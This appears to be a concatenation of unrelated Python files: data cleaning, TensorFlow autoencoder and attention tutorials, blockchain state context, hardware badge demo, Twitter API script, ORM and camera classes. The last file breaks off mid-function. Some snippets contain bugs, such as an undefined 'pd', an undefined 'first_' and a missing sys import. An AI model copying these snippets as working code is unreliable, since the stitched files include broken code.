import pandas as pd import matplotlib.pyplot as plt import math class Frame(): def __init__(self, path_): self.path = path_ self.data =pd.read_csv(filepath_or_buffer=path_, delimiter=',') def clean(self, subs:bool): Ncol = len( self.data.columns ) self.data.dropna(inplace=True, thresh=Ncol, axis=0)# elimina lineas vacias if subs: for i in self.data.columns[1:]: self.data[i].fillna( method='ffill', inplace=True) def split_datetime(self, col:str, delimiter:str, dropit:bool): field_split = self.data[col].str.split(delimiter) self.data['Fecha'] = field_split.apply(lambda x: x[0]) self.data['Time'] = field_split.apply(lambda x: x[1]) self.data.drop(col,axis=1, inplace=True) def dec_time(self, delimiter:str): field_split = self.data['Time'].str.split(delimiter) self.data['Hora'] = field_split.apply(lambda x: float(x[0]) + float(x[1]) / 60 + float(x[2])/3600) def check_decimals(self, col:str, digits:int, dropit:bool): self.data[col+'ajus'] = self.data[col].apply( lambda x: (x/(pow(10, len(str(round(x))) - digits))) if (digits != len(str(round(x)))) else x) self.data.drop(col,axis=1, inplace=True) class Granularity(): def __init__(self, df_): self.data = df_ def SizzSub(self,col): first_ = int(self.data[col].index[0]) self.data['index'] = self.data[col].index self.data['colval'] = self.data['index'].apply(lambda x: self.data[col][x] if ( x == first_) else self.data[col][x-1]) self.data[col + "SizzSub"] = abs( (self.data[col] - self.data['colval']).round(4) ) self.data.drop('index',axis=1, inplace=True) self.data.drop('colval',axis=1, inplace=True) def SizzRep(self,col): self.data['index'] = self.data[col].index self.data['colval'] = self.data['index'].apply(lambda x: self.data[col][x] if ( x == first_) else self.data[col][x-1]) #self.data[col + "SizzRep"] = abs( (self.data[col] - self.data['colval']).round(4) ) #self.data.drop('index',axis=1, inplace=True) #self.data.drop('colval',axis=1, inplace=True)
nilq/baby-python
python
# 본 Code에서 사용할 tensorflow, matplotlib.pyplot, nupmy, random을 import한다. import tensorflow as tf import matplotlib.pyplot as plt import numpy as np import random # MNIST data를 불러오고 이를 one_hot encoding합니다. from tensorflow.examples.tutorials.mnist import input_data mnist = input_data.read_data_sets("./mnist/data/", one_hot=True) # parameter 설정 learning_rate = 0.01 training_epoch = 15 batch_size = 100 #Hidden layer의 Feature 개수 n_hidden = 300 # 입력의 크기 28 x 28 pixels n_input = 28*28 # Step 1 Neural network setting # Y는 placeholder로 선언되지 않습니다. X = tf.placeholder(tf.float32, [None, n_input]) # input -> encoder -> decoder -> output # Encoder는 정보를 압축하여 Feature를 얻어냅니다. W1 = tf.Variable(tf.random_normal([n_input,n_hidden])) B1 = tf.Variable(tf.random_normal([n_hidden])) # Deocder는 출력을 입력값과 동일하게 하여 입력과 같은 아웃풋을 만들어 냅니다. W2 = tf.Variable(tf.random_normal([n_hidden,n_input])) B2 = tf.Variable(tf.random_normal([n_input])) encoder = tf.nn.sigmoid(tf.add(tf.matmul(X,W1),B1)) decoder = tf.nn.sigmoid(tf.add(tf.matmul(encoder,W2),B2)) # Decoder는 입력과 비슷한 결과를 내야합니다. Y = X # 입력과 비슷하게 Decoder의 출력이 나와야 하기 때문에 Cost function으로 decoder와 실제 값의 차이의 제곱으로 정합니다. # Cost function의 값이 크다면 실제 값과 Decoding된 결과가 다르다는 것을 의미합니다. cost = tf.reduce_mean(tf.pow(Y - decoder,2)) train = tf.train.AdamOptimizer(learning_rate).minimize(cost) total_batch = int(mnist.train.num_examples/batch_size) # Step 2 Training with tf.Session() as sess: init = tf.global_variables_initializer() sess.run(init) for epoch in range(training_epoch): sum_cost = 0 for i in range(total_batch): batch_xs, batch_ys = mnist.train.next_batch(batch_size) sess.run(train, feed_dict={X:batch_xs}) sum_cost += sess.run(cost,feed_dict={X:batch_xs}) print("Epoch:",epoch,"Avg Cost:",sum_cost/total_batch) print("Optimization finished") # Decoding pred = sess.run(decoder,feed_dict={X:mnist.test.images[:10]}) figure, axis = plt.subplots(2,10,figsize=(10,2)) for i in range(10): axis[0][i].set_axis_off() axis[1][i].set_axis_off() axis[0][i].imshow(np.reshape(mnist.test.images[i],(28,28))) axis[1][i].imshow(np.reshape(pred[i],(28,28))) plt.show()
nilq/baby-python
python
def kw_only_args(*, kwo): pass def kw_only_args_with_varargs(*varargs, kwo, another='default'): pass
nilq/baby-python
python
# Copyright 2017 NTRLab # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ------------------------------------------------------------------------------ import logging import uuid from threading import Condition from threading import Lock LOGGER = logging.getLogger(__name__) class AuthorizationException(Exception): def __init__(self, address): super(AuthorizationException, self).__init__( "Not authorized to read/write to {}".format(address)) class ExecutionContext(object): """A thread-safe data structure holding address-_ContextFuture pairs and the addresses that can be written to and read from. """ def __init__(self, state_hash, read_list, write_list, base_context_ids): """ Args: state_hash: the Merkle root read_list (list of str): Addresses that were listed as inputs on the transaction. write_list (list of str): Addresses that were listed as outputs on the transaction. base_context_ids (list of str): Context ids of contexts that this context is based off of. """ self._state_hash = state_hash # Create copies of the read and write lists self._read_list = read_list.copy() self._write_list = write_list.copy() self._state = {} self._lock = Lock() self._read_only = False self.base_contexts = base_context_ids self._id = uuid.uuid4().hex self._execution_data = [] self._execution_events = [] @property def session_id(self): return self._id @property def merkle_root(self): return self._state_hash def _contains_and_deleted(self, address): #LOGGER.debug('ExecutionContext:_contains_and_deleted "%s"', address) return address in self._state and \ self._state[address].deleted_in_context() def _contains_and_set(self, address): return address in self._state and self._state[address].set_in_context() def _contains_and_not_set(self, add): return add in self._state and not self._state[add].set_in_context() def _contains(self, address): return address in self._state def __contains__(self, item): with self._lock: return self._contains(item) def _get(self, address): value = None if self._contains(address): value = self._state[address].result() return value def _get_if_set(self, address): value = None if self._contains_and_set(address): value = self._state[address].result() return value def _get_if_deleted(self, address): add = None if self._contains_and_deleted(address=address): add = address return add def _get_if_not_set(self, address): value = None if self._contains_and_not_set(address): value = self._state[address].result() return value def is_read_only(self): return self._read_only def make_read_only(self): with self._lock: if not self._read_only: for fut in self._state.values(): fut.make_read_only() self._read_only = True def get(self, addresses): """Returns the value in this context, or None, for each address in addresses. Useful for gets on the context manager. Args: addresses (list of str): The addresses to return values for, if within this context. Returns: results (list of bytes): The values in state for these addresses. """ with self._lock: results = [] for add in addresses: self.validate_read(add) results.append(self._get(add)) return results def get_if_set(self, addresses): """Returns the value set in this context, or None, for each address in addresses. Args: addresses (list of str): The addresses to return values for, if set within this context. Returns: (list): bytes set at the address or None """ with self._lock: results = [] for add in addresses: results.append(self._get_if_set(add)) return results def get_if_deleted(self, addresses): """Returns a list of addresses that have been deleted, or None if it hasn't been deleted. Args: addresses (list of str): The addresses to check if deleted. Returns: (list of str): The addresses, if deleted, or None. """ with self._lock: results = [] for add in addresses: results.append(self._get_if_deleted(add)) return results def get_if_not_set(self, addresses): """Returns the value at an address if it was an input to the txn but never set. It returns None if that address was never set in the merkle database, or if the address is not within the context. Args: addresses (list of str): The full 70 character addresses. Returns: (list): bytes at that address but not set within the context """ with self._lock: results = [] for add in addresses: results.append(self._get_if_not_set(add)) return results def get_all_if_set(self): """Return all the addresses and opaque values set in the context. Useful in the squash method. Returns: (dict of str to bytes): The addresses and bytes that have been set in the context. """ with self._lock: results = {} for add, fut in self._state.items(): if self._contains_and_set(add): results[add] = fut.result() return results def get_all_if_deleted(self): """Return all the addresses deleted in the context. Useful in the squash method. Returns: (dict of str to bytes): The addresses and bytes that have been deleted in the context. """ with self._lock: results = {} for add, fut in self._state.items(): if self._contains_and_deleted(add): results[add] = fut.result() return results def create_prefetch(self, addresses): """Create futures needed before starting the process of reading the address's value from the merkle tree. Args: addresses (list of str): addresses in the txn's inputs that aren't in any base context (or any in the chain). """ with self._lock: for add in addresses: self._state[add] = _ContextFuture(address=add, wait_for_tree=True) def create_initial(self, address_values): """Create futures from inputs with the current value for that address at the start of that context. Args: address_values (list of tuple): The tuple is string, bytes of the address and value. """ with self._lock: for add, val in address_values: self._state[add] = _ContextFuture(address=add, result=val) def set_from_tree(self, address_value_dict): """Set the result for each future at the given addresses with the value stored in the merkle database. Args: address_value_dict (dict of str: bytes): The unique full addresses that the bytes values should be set with. """ #LOGGER.debug('set_from_tree: %s\n',address_value_dict) for address, value in address_value_dict.items(): if address in self._state: self._state[address].set_result(result=value, from_tree=True) def delete_direct(self, addresses): """Called in the context manager's delete method to either mark an entry for deletion , or create a new future and immediately set it for deletion in the future. Args: address_list (list of str): The unique full addresses. Raises: AuthorizationException """ with self._lock: for address in addresses: self._validate_write(address) if address in self._state: self._state[address].set_deleted() else: fut = _ContextFuture(address=address) self._state[address] = fut fut.set_deleted() def set_direct(self, address_value_dict): """Called in the context manager's set method to either overwrite the value for an address, or create a new future and immediately set a value in the future. Args: address_value_dict (dict of str:bytes): The unique full addresses with bytes to set at that address. Raises: AuthorizationException """ with self._lock: for address, value in address_value_dict.items(): self._validate_write(address) if address in self._state: self._state[address].set_result(result=value) else: fut = _ContextFuture(address=address) self._state[address] = fut fut.set_result(result=value) def _validate_write(self, address): """Raises an exception if the address is not allowed to be set in this context, based on txn outputs. Notes: Checks that the address is either listed fully as one of the outputs, or some portion of the address is listed as a namespace in the outputs of the txn. Args: address (str): The address to be validated. The context manager validates the address correctness (70 hex characters). Returns: None Raises: AuthorizationException """ if not any(address.startswith(ns) for ns in self._write_list): raise AuthorizationException(address=address) def validate_read(self, address): """Raises an exception if the address is not allowed to be read in this context, based on txn inputs. Args: address (str): An address to be validated. Returns: None Raises: AuthorizationException """ if not any(address.startswith(ns) for ns in self._read_list): raise AuthorizationException(address=address) def add_execution_data(self, data): with self._lock: self._execution_data.append(data) def get_execution_data(self): with self._lock: return self._execution_data.copy() def add_execution_event(self, event): with self._lock: self._execution_events.append(event) def get_execution_events(self): with self._lock: return self._execution_events.copy() class _ContextFuture(object): """Controls access to bytes set in the _result variable. The booleans that are flipped in set_result, based on whether the value is being set from the merkle tree or a direct set on the context manager are needed to later determine whether the value was set in that context or was looked up as a new address location from the merkle tree and then only read from, not set. In any context the lifecycle of a _ContextFuture can be several paths: Input: Address not in base: F -----> get from merkle database ----> get from the context Address in base: |---> set (F) F --->| |---> get Output: Doesn't exist ----> set address in context (F) Input + Output: Address not in base: |-> set F |-> get from merkle -| | |-> get | | | |-> noop |--> set Can happen before the pre-fetch operation |-> set (F) ---> get | |-> set (F) ----> set | Address in base: |-> set (F) Doesn't exist -| |-> get Future doesn't exit in context | |-> get ----> set (F) """ def __init__(self, address, result=None, wait_for_tree=False): self.address = address self._result = result self._result_set_in_context = False self._condition = Condition() self._wait_for_tree = wait_for_tree self._tree_has_set = False self._read_only = False self._deleted = False def make_read_only(self): with self._condition: if self._wait_for_tree and not self._result_set_in_context: self._condition.wait_for( lambda: self._tree_has_set or self._result_set_in_context) self._read_only = True def set_in_context(self): with self._condition: return self._result_set_in_context def deleted_in_context(self): with self._condition: return self._deleted def result(self): """Return the value at an address, optionally waiting until it is set from the context_manager, or set based on the pre-fetch mechanism. Returns: (bytes): The opaque value for an address. """ if self._read_only: return self._result with self._condition: if self._wait_for_tree and not self._result_set_in_context: self._condition.wait_for( lambda: self._tree_has_set or self._result_set_in_context) return self._result def set_deleted(self): self._result_set_in_context = False self._deleted = True def set_result(self, result, from_tree=False): """Set the addresses's value unless the future has been declared read only. Args: result (bytes): The value at an address. from_tree (bool): Whether the value is being set by a read from the merkle tree. Returns: None """ if self._read_only: if not from_tree: LOGGER.warning("Tried to set address %s on a" " read-only context.", self.address) return with self._condition: if self._read_only: if not from_tree: LOGGER.warning("Tried to set address %s on a" " read-only context.", self.address) return if from_tree: # If the result has not been set in the context, overwrite the # value with the value from the merkle tree. Otherwise, do # nothing. if not self._result_set_in_context: self._result = result self._tree_has_set = True else: self._result = result self._result_set_in_context = True self._deleted = False self._condition.notify_all()
nilq/baby-python
python
import logging from logging.config import dictConfig def setup(conf): dictConfig(conf) class LoggerMixIn: def __init__(self, *args, **kwargs): logger_name = getattr(self, "__logger_name__", self.__class__.__name__) self.logger = logging.getLogger(logger_name) for lvl in ["CRITICAL", "DEBUG", "INFO", "WARN", "WARNING", "ERROR", "FATAL"]: setattr(self.logger, lvl, getattr(logging, lvl)) super().__init__(*args, **kwargs)
nilq/baby-python
python
# Copyright © 2019 Province of British Columbia # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """All of the message templates used across the various services.""" import json import stan.pb.protocol_pb2 as protocol from stan.aio.client import Msg from queue_common import messages def test_create_payment_msg(): """Assert a payment message can be created.""" # setup identifier = 'test_id' status = 'TEST_STATUS' return messages.create_payment_msg(identifier, status) == {'paymentToken': {'id': identifier, 'statusCode': status}} def test_get_payment_id_from_msg(): """Assert that an id can be extracted from the payment message.""" # setup identifier = 'test_id' status = 'TEST_STATUS' token = {'paymentToken': {'id': identifier, 'statusCode': status}} msg = Msg() msg.proto = protocol.MsgProto msg.proto.data = json.dumps(token).encode('utf-8') assert identifier == messages.get_payment_id_from_msg(msg) assert not messages.get_payment_id_from_msg(None)
nilq/baby-python
python
from . import location
nilq/baby-python
python
import os import sys import time import machine import badger2040 from badger2040 import WIDTH, HEIGHT REAMDE = """ Images must be 296x128 pixel with 1bit colour depth. You can use examples/badger2040/image_converter/convert.py to convert them: python3 convert.py --binary --resize image_file_1.png image_file_2.png image_file_3.png Create a new "images" directory via Thonny, and upload the .bin files there. """ OVERLAY_BORDER = 40 OVERLAY_SPACING = 20 OVERLAY_TEXT_SIZE = 0.5 TOTAL_IMAGES = 0 # Try to preload BadgerPunk image try: os.mkdir("images") except OSError: pass try: import badgerpunk with open("images/badgerpunk.bin", "wb") as f: f.write(badgerpunk.data()) f.flush() with open("images/readme.txt", "w") as f: f.write(REAMDE) f.flush() del badgerpunk except (OSError, ImportError): pass try: IMAGES = [f for f in os.listdir("/images") if f.endswith(".bin")] TOTAL_IMAGES = len(IMAGES) except OSError: pass display = badger2040.Badger2040() button_a = machine.Pin(badger2040.BUTTON_A, machine.Pin.IN, machine.Pin.PULL_DOWN) button_b = machine.Pin(badger2040.BUTTON_B, machine.Pin.IN, machine.Pin.PULL_DOWN) button_c = machine.Pin(badger2040.BUTTON_C, machine.Pin.IN, machine.Pin.PULL_DOWN) button_up = machine.Pin(badger2040.BUTTON_UP, machine.Pin.IN, machine.Pin.PULL_DOWN) button_down = machine.Pin(badger2040.BUTTON_DOWN, machine.Pin.IN, machine.Pin.PULL_DOWN) image = bytearray(int(296 * 128 / 8)) current_image = 0 show_info = True # Draw an overlay box with a given message within it def draw_overlay(message, width, height, line_spacing, text_size): # Draw a light grey background display.pen(12) display.rectangle((WIDTH - width) // 2, (HEIGHT - height) // 2, width, height) # Take the provided message and split it up into # lines that fit within the specified width words = message.split(" ") lines = [] current_line = "" for word in words: if display.measure_text(current_line + word + " ", text_size) < width: current_line += word + " " else: lines.append(current_line.strip()) current_line = word + " " lines.append(current_line.strip()) display.pen(0) display.thickness(2) # Display each line of text from the message, centre-aligned num_lines = len(lines) for i in range(num_lines): length = display.measure_text(lines[i], text_size) current_line = (i * line_spacing) - ((num_lines - 1) * line_spacing) // 2 display.text(lines[i], (WIDTH - length) // 2, (HEIGHT // 2) + current_line, text_size) def show_image(n): file = IMAGES[n] name = file.split(".")[0] open("images/{}".format(file), "r").readinto(image) display.image(image) if show_info: name_length = display.measure_text(name, 0.5) display.pen(0) display.rectangle(0, HEIGHT - 21, name_length + 11, 21) display.pen(15) display.rectangle(0, HEIGHT - 20, name_length + 10, 20) display.pen(0) display.text(name, 5, HEIGHT - 10, 0.5) for i in range(TOTAL_IMAGES): x = 286 y = int((128 / 2) - (TOTAL_IMAGES * 10 / 2) + (i * 10)) display.pen(0) display.rectangle(x, y, 8, 8) if current_image != i: display.pen(15) display.rectangle(x + 1, y + 1, 6, 6) display.update() if TOTAL_IMAGES == 0: display.pen(15) display.clear() draw_overlay("To run this demo, create an /images directory on your device and upload some 1bit 296x128 pixel images.", WIDTH - OVERLAY_BORDER, HEIGHT - OVERLAY_BORDER, OVERLAY_SPACING, OVERLAY_TEXT_SIZE) display.update() sys.exit() show_image(current_image) while True: if button_up.value(): if current_image > 0: current_image -= 1 show_image(current_image) if button_down.value(): if current_image < TOTAL_IMAGES - 1: current_image += 1 show_image(current_image) if button_a.value(): show_info = not show_info show_image(current_image) if button_b.value() or button_c.value(): display.pen(15) display.clear() draw_overlay("To add images connect Badger2040 to a PC, load up Thonny, and see readme.txt in images/", WIDTH - OVERLAY_BORDER, HEIGHT - OVERLAY_BORDER, OVERLAY_SPACING, 0.5) display.update() time.sleep(4) show_image(current_image) time.sleep(0.01)
nilq/baby-python
python
import requests from requests_oauthlib import OAuth1 import json reload(sys) sys.setdefaultencoding("utf-8") params = {'app_key': 'xx', 'app_secret': 'xx', 'access_token': 'xx-xx', 'access_secret': 'xx'} auth = OAuth1(params['app_key'], params['app_secret'], params['access_token'], params['access_secret']) twittername = 'nameoftwitteraccount' # Twitter API can only limit by day since = '2017-09-20' #date # https://dev.twitter.com/rest/public/search # note that space, #, etc. have their special percent encoding https://en.wikipedia.org/wiki/Percent-encoding url_rest = 'https://api.twitter.com/1.1/search/tweets.json?q=from%3A{}&result_type=recent&since%3A{}'.format(twittername, since) results = requests.get(url_rest, auth=auth) results = results.json() #convert json into dict results = json.dumps(results, indent=4) #print pretty, converts to string with open('text.json', 'wb') as file: file.write(results)
nilq/baby-python
python
# -*- coding: utf-8 -*- import matplotlib.pyplot as plt from ....Functions.init_fig import init_fig def plot( self, fig=None, ax=None, sym=1, alpha=0, delta=0, is_edge_only=False, comp_machine=None, is_show_fig=True, save_path=None, win_title=None, ): """Plot the Machine in a matplotlib fig Parameters ---------- self : Machine A Machine object fig : Matplotlib.figure.Figure existing figure to use if None create a new one ax : Matplotlib.axes.Axes object Axis on which to plot the data sym : int Symmetry factor (1= full machine, 2= half of the machine...) alpha : float Angle for rotation [rad] delta : complex Complex value for translation is_edge_only: bool To plot transparent Patches comp_machine : Machine A machine to plot in transparency on top of the self machine is_show_fig : bool To call show at the end of the method save_path : str full path including folder, name and extension of the file to save if save_path is not None """ (fig, ax, _, _) = init_fig(fig=fig, ax=ax, shape="rectangle") # Call each plot method to properly set the legend if self.frame is not None: self.frame.plot( fig=fig, ax=ax, sym=sym, alpha=alpha, delta=delta, is_edge_only=is_edge_only, is_show_fig=False, ) Wfra = self.frame.comp_height_eq() else: Wfra = 0 # Determin order of plotting parts lam_list = self.get_lam_list(is_int_to_ext=True) Rext = lam_list[-1].Rext for lam in lam_list[::-1]: lam.plot( fig=fig, ax=ax, sym=sym, alpha=alpha, delta=delta, is_edge_only=is_edge_only, is_show_fig=False, ) if lam_list[0].Rint > 0 and self.shaft is not None: self.shaft.plot( fig=fig, ax=ax, sym=sym, alpha=alpha, delta=delta, is_edge_only=is_edge_only, is_show_fig=False, ) Lim = (Rext + Wfra) * 1.5 # Axes limit for plot if comp_machine is not None: comp_machine.rotor.plot( fig, ax, sym=sym, alpha=alpha, delta=delta, is_edge_only=True, is_show_fig=is_show_fig, ) comp_machine.stator.plot( fig, ax, sym=sym, alpha=alpha, delta=delta, is_edge_only=True, is_show_fig=is_show_fig, ) ax.set_xlabel("(m)") ax.set_ylabel("(m)") ax.set_title(self.name) # Axis Setup plt.axis("equal") # The Lamination is centered in the figure ax.set_xlim(-Lim, Lim) ax.set_ylim(-Lim, Lim) # Set Windows title if self.name not in ["", None] and win_title is None: win_title = self.name + " plot machine" if save_path is not None: fig.savefig(save_path) plt.close() if is_show_fig: fig.show() if win_title: manager = plt.get_current_fig_manager() if manager is not None: manager.set_window_title(win_title)
nilq/baby-python
python
from core.Model import * from core.Utils import Utils from models.User import User from models.AppVersion import AppVersion class Device(Base, Model): __tablename__ = "device" id = Column(BigInteger, primary_key=True, autoincrement=True) uuid = Column(String(300), nullable=False) user_id = Column(Integer, ForeignKey(User.id), nullable=False) token = Column(String(100), default=None) app_version_id = Column(BigInteger, ForeignKey(AppVersion.id), default=1) created = Column(DateTime, default=Utils.time()) updated = Column(DateTime, default=Utils.time(), onupdate=Utils.time()) enable = Column(mysql.TINYINT(1), default=1) user = relationship(User) app_version = relationship(AppVersion) formatters = {"created": Utils.date_formatter, "updated": Utils.date_formatter}
nilq/baby-python
python
from .BaseCamera import BaseCamera import numpy as np import math class PersPectiveCamera(BaseCamera): def __init__(self): BaseCamera.__init__(self, "PerspectiveCamera") def get_projection_mat(self): # http://www.songho.ca/opengl/gl_projectionmatrix.html projection_mat = np.eye(4) projection_mat[0, 0] = 2 / self.magnification_x projection_mat[1, 1] = 2 / self.magnification_y projection_mat[2, 2] = -(self.far + self.near) / (self.far - self.near) projection_mat[2, 3] = -(2 * self.far * self.near) / (self.far - self.near) projection_mat[3, 2] = -1 projection_mat[3, 3] = 0 return projection_mat def set_by_field_of_view(self, fov_x, fov_y=None): ''' Set the intrinsic by given field of view, in angle degrees :param fov_x: :param fov_y: Optional for y direction; Use the same value as for x direction if None ''' if fov_y is None: fov_y = fov_x self.set_parameters( magnification_x=2 * math.tan(fov_x / 2), magnification_y=2 * math.tan(fov_y / 2), ) def set_by_35mm_equivalent_focal_length(self, focal_x, focal_y=None): ''' Set the intrinsic by given 35mm equivalent focal lengths. https://en.wikipedia.org/wiki/35_mm_equivalent_focal_length :param focal_x: :param focal_y: Optional for y direction; Use the same value as for x direction if None ''' if focal_y is None: focal_y = focal_x # 35mm equivalent sensor width and height for this camera film_35mm_height = math.sqrt((36 ** 2 + 24 ** 2) / (1 + self.aspect_ratio ** 2)) film_35mm_width = film_35mm_height * self.aspect_ratio self.set_parameters( magnification_x=film_35mm_width / focal_x, magnification_y=film_35mm_height / focal_y ) def set_by_sensor_and_focal_length(self, sensor_width, sensor_height, focal_x, focal_y=None): self.aspect_ratio = sensor_width / sensor_height if focal_y is None: focal_y = focal_x # 35mm equivalent sensor width and height for this camera self.set_parameters( magnification_x=sensor_width / focal_x, magnification_y=sensor_height / focal_y )
nilq/baby-python
python
""" django admin pages for program support models """ from config_models.admin import ConfigurationModelAdmin from django.contrib import admin from openedx.core.djangoapps.programs.models import ProgramsApiConfig class ProgramsApiConfigAdmin(ConfigurationModelAdmin): pass admin.site.register(ProgramsApiConfig, ProgramsApiConfigAdmin)
nilq/baby-python
python
import pandas def find_na(df): print(pd.isna(df).sum())
nilq/baby-python
python
#!/usr/bin/env python3 import pyglet import glooey import run_demos window = pyglet.window.Window() gui = glooey.Gui(window) bin = glooey.Bin() widget = glooey.Placeholder(100, 100) bin.add(widget) gui.add(bin) @run_demos.on_space(gui) def test_bin(): bin.add(widget) yield "Put a widget in the bin." bin.clear() yield "Clear the bin." pyglet.app.run()
nilq/baby-python
python
# -*- coding:utf-8 -*- import os import random import matplotlib.pyplot as plt import numpy as np import pandas as pd import sentencepiece as spm import tensorflow as tf import tensorflow.keras.backend as K os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' random_seed = 1234 random.seed(random_seed) np.random.seed(random_seed) tf.random.set_seed(random_seed) print(tf.__version__) print(tf.config.list_physical_devices('GPU')) print(tf.test.gpu_device_name()) # # prepare dir # data_dir = './data' if not os.path.exists(data_dir): data_dir = '../data' print(os.listdir(data_dir)) songys_dir = os.path.join(data_dir, 'songys') if not os.path.exists(songys_dir): os.makedirs(songys_dir) train_txt = os.path.join(songys_dir, 'ChatbotData.csv') # # file check # def print_file(filename, count=10): """ 라인 수 만큼 파일내용 출력 :param filename: file name :param count: print line count """ with open(filename) as f: for i, line in enumerate(f): print(line.strip()) if count < i: break # # data read # https://pandas.pydata.org/pandas-docs/stable/index.html # # head=0 첫벗째 줄이 head train_data = pd.read_csv(train_txt, header=0, delimiter=',') print(f'전체 학습 raw 개수: {len(train_data)}') train_data = train_data.dropna() print(f'전체 학습 valid 개수: {len(train_data)}') train_data = train_data.sample(1000) # 빠른 확인을 위해 1000개만 사용 print(f'전체 학습 sample 개수: {len(train_data)}') label_counts = train_data['label'].value_counts() print(f'전체 학습 label 개수: {label_counts}') # # vocabulary # # vocab load vocab_file = os.path.join(data_dir, 'ko_32000.model') vocab = spm.SentencePieceProcessor() vocab.load(vocab_file) # # tokenize # questions, answers = [], [] for i, row in train_data.iterrows(): question = vocab.encode_as_pieces(row['Q']) questions.append(question) answer = vocab.encode_as_pieces(row['A']) answers.append(answer) assert len(questions) == len(answers) print(questions[:100]) print(answers[:100]) # # token to id # question_ids = [[vocab.piece_to_id(p) for p in question] for question in questions] answer_ids = [[vocab.piece_to_id(p) for p in answer] for answer in answers] print(question_ids[:100]) print(answer_ids[:100]) # # pad # # 길이가 달라서 matrix 생성 안됨 print(np.array(question_ids)[:50]) print(np.array(answer_ids)[:50]) # 길이 확인 question_length = [len(question_id) for question_id in question_ids] print(question_length[:100]) answer_length = [len(answer_id) for answer_id in answer_ids] print(answer_length[:100]) # 최대 길이 확인 answer_max_length, question_max_length = max(question_length), max(answer_length) # 최대 sequence 길이 지정 (임의 지정) n_seq = max(answer_max_length, question_max_length) + 2 print(answer_max_length, question_max_length, n_seq) # # inputs # # train numpy matrix enc_inputs = np.zeros((len(question_ids), n_seq)) dec_inputs = np.zeros((len(answer_ids), n_seq)) dec_labels = np.zeros((len(answer_ids), n_seq)) print(enc_inputs.shape, enc_inputs[0], enc_inputs[-1]) print(dec_inputs.shape, dec_inputs[0], dec_inputs[-1]) print(dec_labels.shape, dec_labels[0], dec_labels[-1]) # assing question_ids to enc_inputs for i, token_id in enumerate(question_ids): token_id += [0] * (n_seq - len(token_id)) token_id = token_id[:n_seq] assert len(token_id) == n_seq enc_inputs[i] = token_id print(enc_inputs.shape, enc_inputs[0], enc_inputs[-1]) # assing answer_ids to dec_inputs and dec_labels n_max = n_seq - 1 for i, token_id in enumerate(answer_ids): token_id = token_id[:n_max] dec_input = [vocab.bos_id()] + token_id dec_input += [0] * (n_seq - len(dec_input)) dec_label = token_id + [vocab.eos_id()] dec_label += [0] * (n_seq - len(dec_label)) assert len(dec_input) == len(dec_label) == n_seq dec_inputs[i] = dec_input dec_labels[i] = dec_label print(dec_inputs.shape, dec_inputs[0].astype(np.int), dec_inputs[-1].astype(np.int)) print(dec_labels.shape, dec_labels[0].astype(np.int), dec_labels[-1].astype(np.int)) train_inputs = (enc_inputs, dec_inputs) # # loss and accuracy # def lm_loss(y_true, y_pred): """ pad 부분을 제외하고 loss를 계산하는 함수 :param y_true: 정답 :param y_pred: 예측 값 :retrun loss: pad 부분이 제외된 loss 값 """ loss = tf.keras.losses.SparseCategoricalCrossentropy(reduction=tf.keras.losses.Reduction.NONE)(y_true, y_pred) mask = tf.cast(tf.not_equal(y_true, 0), tf.float32) loss *= mask return loss def lm_acc(y_true, y_pred): """ pad 부분을 제외하고 accuracy를 계산하는 함수 :param y_true: 정답 :param y_pred: 예측 값 :retrun loss: pad 부분이 제외된 accuracy 값 """ y_pred_class = tf.cast(K.argmax(y_pred, axis=-1), tf.float32) y_true = tf.cast(y_true, tf.float32) matches = tf.cast(K.equal(y_true, y_pred_class), tf.float32) mask = tf.cast(tf.not_equal(y_true, 0), tf.float32) matches *= mask accuracy = K.sum(matches) / K.maximum(K.sum(mask), 1) return accuracy # # Attention # # inputs enc_tokens = np.random.randint(1, 10, (1, 5)) print(enc_tokens) dec_tokens = np.random.randint(1, 10, (1, 6)) print(dec_tokens) # embedding embedding = tf.keras.layers.Embedding(10, 4) enc_embed = embedding(enc_tokens) print(enc_embed) dec_embed = embedding(dec_tokens) print(dec_embed) # score by for loop attn_score_t = np.zeros((len(dec_embed[0]), len(enc_embed[0]))) print(attn_score_t) for i in range(len(dec_embed[0])): dec_hidden = dec_embed[0][i] for j in range(len(enc_embed[0])): enc_hidden = enc_embed[0][j] score = tf.matmul([dec_hidden], [enc_hidden], transpose_b=True) attn_score_t[i][j] = score[0] print(attn_score_t) # score by matmul attn_score = tf.matmul(dec_embed, enc_embed, transpose_b=True) print(attn_score) # attn prob attn_prob = tf.nn.softmax(attn_score, axis=-1) print(attn_prob) # atten output by for loop attn_out_t = np.zeros((len(dec_embed[0]), len(dec_embed[0][0]))) print(attn_out_t) for i in range(len(attn_prob[0])): attn_row = attn_prob[0][i] assert len(attn_row) == len(enc_embed[0]) weighted_sum = 0 for j in range(len(enc_embed[0])): enc_hidden = enc_embed[0][j] weighted_sum += attn_row[j] * enc_hidden attn_out_t[i] = weighted_sum print(attn_out_t) # atten output by matmul attn_out = tf.matmul(attn_prob, enc_embed) print(attn_out) class DotProductAttention(tf.keras.layers.Layer): """ dot product attention class """ def __init__(self, **kwargs): """ init class :param kwargs: args """ super().__init__(**kwargs) def call(self, inputs): """ run layer :param inputs: enc_input, dec_input tuple :return attn_out: attention output """ enc_input, dec_input = inputs # attention score (dot-product) attn_score = tf.matmul(dec_input, enc_input, transpose_b=True) # attention prov attn_prob = tf.nn.softmax(attn_score, axis=-1) # weighted sum attn_out = tf.matmul(attn_prob, enc_input) return attn_out # atten by class attn_out_c = DotProductAttention()((enc_embed, dec_embed)) print(attn_out_c) # # rnn # def build_model_rnn_dot(n_vocab, d_model): """ rnn attention model build :param n_vocab: number of vocab :param d_model: hidden size :return model: model """ enc_inputs = tf.keras.layers.Input((None,)) dec_inputs = tf.keras.layers.Input((None,)) embedding = tf.keras.layers.Embedding(n_vocab, d_model) enc_hidden = embedding(enc_inputs) # bs, n_seq, 